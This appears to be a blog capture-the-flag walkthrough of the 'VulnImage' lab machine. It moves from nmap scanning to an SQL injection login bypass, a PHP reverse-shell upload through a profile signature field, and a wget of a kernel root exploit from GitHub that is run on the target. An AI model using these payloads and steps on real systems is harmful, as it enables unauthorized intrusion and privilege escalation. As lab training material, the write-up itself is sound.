Monday 1 February 2016

VulnImage challenge

Hello,

Looking for our target:
root@osboxes:~# nmap -sn 192.168.1.0/24
OK, from scanning our subnet we know that our target has IP: 192.168.1.103
What kind of services are running on our target?
root@osboxes:~# nmap -sV -A 192.168.1.103

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 15:32 GMT
Nmap scan report for 192.168.1.103
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 5.1p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 8c:77:73:be:0d:a8:d5:7f:d8:b7:27:30:ed:52:85:23 (DSA)
|_  2048 8b:df:2d:cd:cb:d1:5e:a8:8e:70:93:2d:a6:5f:f1:3c (RSA)
25/tcp   open  smtp        Exim smtpd 4.50
| smtp-commands: localhost.localdomain Hello nmap.scanme.org [192.168.1.104], SIZE 52428800, PIPELINING, HELP,
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
80/tcp   open  http        Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-24+lenny4
| mysql-info:
|   Protocol: 53
|   Version: .0.51a-24+lenny4
|   Thread ID: 33
|   Capabilities flags: 41516
|   Some Capabilities: Support41Auth, SupportsCompression, SupportsTransactions, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: PR//?/jL{G0XLS<sProU
7777/tcp open  cbt?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port7777-TCP:V=6.47%I=7%D=2/1%Time=56AF7AA0%P=i686-pc-linux-gnu%r(NULL,
SF:D,"HELO\nCOMMAND:")%r(X11Probe,14,"HELO\nCOMMAND:RECV:\x20l")%r(Socks5,
SF:15,"HELO\nCOMMAND:RECV:\x20\x05\x04")%r(Arucer,3E,"HELO\nCOMMAND:RECV:\
SF:x20\xc2\xe5\xe5\xe5\x9e\xa0\xd7\xa4\xa6\xd0\xd5\xdd\xdc\xc8\xd6\xdd\xd7
SF:\xd5\xc8\xd1\xd6\x83\x80\xc8\xdd\xa4\xd1\xa1\xc8\xa4\xd2\xd5\xd7\xdd\xa
SF:3\xa4\xa1\xdd\xa6\xd7\xdd\x98\xe5")%r(GenericLines,17,"HELO\nCOMMAND:RE
SF:CV:\x20\r\n\r\n")%r(GetRequest,25,"HELO\nCOMMAND:RECV:\x20GET\x20/\x20H
SF:TTP/1\.0\r\n\r\n")%r(HTTPOptions,29,"HELO\nCOMMAND:RECV:\x20OPTIONS\x20
SF:/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,29,"HELO\nCOMMAND:RECV:\x20OPTIO
SF:NS\x20/\x20RTSP/1\.0\r\n\r\n")%r(RPCCheck,14,"HELO\nCOMMAND:RECV:\x20\x
SF:80")%r(DNSVersionBindReq,13,"HELO\nCOMMAND:RECV:\x20")%r(DNSStatusReque
SF:st,13,"HELO\nCOMMAND:RECV:\x20")%r(Help,19,"HELO\nCOMMAND:RECV:\x20HELP
SF:\r\n")%r(SSLSessionReq,15,"HELO\nCOMMAND:RECV:\x20\x16\x03")%r(Kerberos
SF:,13,"HELO\nCOMMAND:RECV:\x20")%r(SMBProgNeg,13,"HELO\nCOMMAND:RECV:\x20
SF:")%r(FourOhFourRequest,48,"HELO\nCOMMAND:RECV:\x20GET\x20/nice%20ports%
SF:2C/Tri%6Eity\.txt%2ebak\x20HTTP/1\.0\r\n\r\n")%r(LPDString,1C,"HELO\nCO
SF:MMAND:RECV:\x20\x01default\n")%r(LDAPBindReq,1E,"HELO\nCOMMAND:RECV:\x2
SF:00\x0c\x02\x01\x01`\x07\x02\x01\x02\x04")%r(SIPOptions,D,"HELO\nCOMMAND
SF::")%r(LANDesk-RC,18,"HELO\nCOMMAND:RECV:\x20TNMP\x04")%r(TerminalServer
SF:,14,"HELO\nCOMMAND:RECV:\x20\x03")%r(NCP,17,"HELO\nCOMMAND:RECV:\x20Dmd
SF:T")%r(NotesRPC,14,"HELO\nCOMMAND:RECV:\x20:")%r(WMSRequest,14,"HELO\nCO
SF:MMAND:RECV:\x20\x01")%r(oracle-tns,13,"HELO\nCOMMAND:RECV:\x20")%r(afp,
SF:13,"HELO\nCOMMAND:RECV:\x20")%r(kumo-server,14,"HELO\nCOMMAND:RECV:\x20
SF:\x94");
MAC Address: 00:0C:29:47:61:1C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.5 - 2.6.12
Network Distance: 1 hop
Service Info: Host: localhost.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: DEBIAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
Excellent, we have got a lof of interesting information. As always let's open the web application in browser.

























Nothing special :-) But below all posts we have also link Post new entry! Hmmm, OK, before execution dirbuster, let's examine the link.






















I examined this web based form in the following way:

Username: admin
Password: admin' OR 1=1 -- -
Title: test
Content: <?php echo "test"; ?>
But unfortunately my post was validated and part <?php was removed from contemt of my post. At least we know that Password field is vulnerable to SQL Injection.
OK, what else can we do? Hmmm, Change profile settings! looks very interesting :-)















Let's try the same technique... OK, I have got following response
  Authenticated.Your signature has successfully been entered updated.
 Good, but I don't know where is stored the signature. Maybe burpsuite will be useful in our case. In the meantime we execute dirbuster.

 We can see that our script is not validated via the web application (is only encoded) and we see that our script is inserted into sig.txt file

Dirbuster result:

















repo directory may be helpful for us and profiles directory as well as admin.
OK, now I am looking for my sig.txt file...
Great! I have found our script in profiles directory!










So, now let's send again our web based form, but now we will edit our file name from sig.txt to shell.php and we will copy content of /usr/share/webshells/php/php-reverse-shell.php, edit $port and $ip and paste into our web form.
Excellent, now we have to find /profiles/admin-shell.php and execute.
Result:











We have lgot imited shell :-)

As always, let's execute command:
www-data@debian:/tmp$ uname -a
uname -a
Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
Good, now we have to find appropriate exploit to escalate our privileges :-)
Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)
 OK, let's play the ball!
www-data@debian:/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
<ve-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz       
--10:00:17--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
           => `9574.tgz'
Resolving github.com... 192.30.252.130
Connecting to github.com[192.30.252.130]:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz [following]
--10:00:18--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz
           => `9574.tgz'
Resolving raw.githubusercontent.com... 185.31.17.133
Connecting to raw.githubusercontent.com[185.31.17.133]:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,359 [application/octet-stream]

100%[====================================>] 4,359         --.--K/s            

10:00:18 (94.48 MB/s) - `9574.tgz' saved [4359/4359]

www-data@debian:/tmp$ ls
ls
9574.tgz
www-data@debian:/tmp$ tar zxvf 9574.tgz
tar zxvf 9574.tgz
therebel/
therebel/exploit.c
therebel/pwnkernel.c
therebel/therebel.sh
www-data@debian:/tmp$ cd therebel
cd therebel
www-data@debian:/tmp/therebel$ ls
ls
exploit.c  pwnkernel.c    therebel.sh
www-data@debian:/tmp/therebel$ bash therebel.sh
And BOOM!!








Game Over!
at